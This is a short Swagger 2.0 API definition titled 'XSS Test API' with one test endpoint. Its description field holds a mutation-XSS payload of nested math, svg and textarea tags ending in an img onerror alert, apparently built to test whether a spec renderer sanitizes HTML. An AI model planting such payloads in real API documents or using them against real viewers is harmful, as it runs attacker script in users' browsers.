swagger: "2.0"
info:
  title: "XSS Test API"
  version: "1.0.0"
  description: >
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(1)'>">
paths:
  /test:
    get:
      summary: "Test endpoint"
      responses:
        200:
          description: "Successful response"
